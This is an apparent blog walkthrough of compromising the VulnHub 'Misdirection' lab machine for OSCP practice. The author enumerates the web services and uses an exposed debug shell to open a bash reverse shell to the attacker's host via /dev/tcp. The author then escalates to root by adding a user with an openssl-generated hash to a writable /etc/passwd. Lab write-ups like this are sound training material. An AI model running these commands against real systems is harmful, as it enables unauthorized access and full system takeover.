Hacking MISDIRECTION- VulnHub
(OSCP similar practice machine)
Vulnhub Description
The purpose of this machine is to grant OSCP students further develop, strengthen, and practice their methodology for the exam.
So Let’s dive into pwning the machine and gain a root shell
______________________________________
Target I.P → 192.168.230.134 | Attacker’s I.P → 192.168.230.128
For the initials, let’s go for scanning and enumeration, I got the results as:
Hmm.. we got some standard ports. Both 80, 8080 has webpage up and running. So first i hop over to http://192.168.230.128:8080.
After that I brute force the web-directories to find some way in and results that showed up are:
After enumerating all of these, some interesting ones found are:
/debug , /wordpress
wordpress was hardcoded with I.P 192.168.1.61:8080. Either I update my /etc/host file or review it later(because I doubt due to the machine’s name ;-/)
So i jumped to http://192.168.230.134/debug. Looks like a shell, AWESOME!!!!
So i ran the command to get a reverse shell:
/bin/bash -c ‘/bin/bash>/dev/tcp/192.168.230.128/9999 0>&1 2>&1 &’
My box was listening to this port, and YES!! we got a shell. Checking for sudo permissions allowed and we got something very easily:
Okay, so without furthur ado as per results, I switched to bretix. This user is allowed to edit the /etc/passwd AWESOME!!!
Now we are going to create a user on the target machine with it’s entry is /etc/passwd file. Here we’ll be using openssl for salted hash
openssl passwd -1 -salt user3 pass123
Back to the target machine. Here we are going to use the hash that we generated in the previous step and make a user neelesh which has the elevated privilege. Now, all we got to do is run su command with the user name we just created and enter the password and root shell.
And we are root!!
That’s all for now,
Until Next Time,
I’m Neelesh, Thanks for the read…
— — — — — — — — — — — — — →
Ping me if you face any issues
Linkedin:- https://www.linkedin.com/in/user-neeleshpatel/
— — — — — — — — — — — — — →
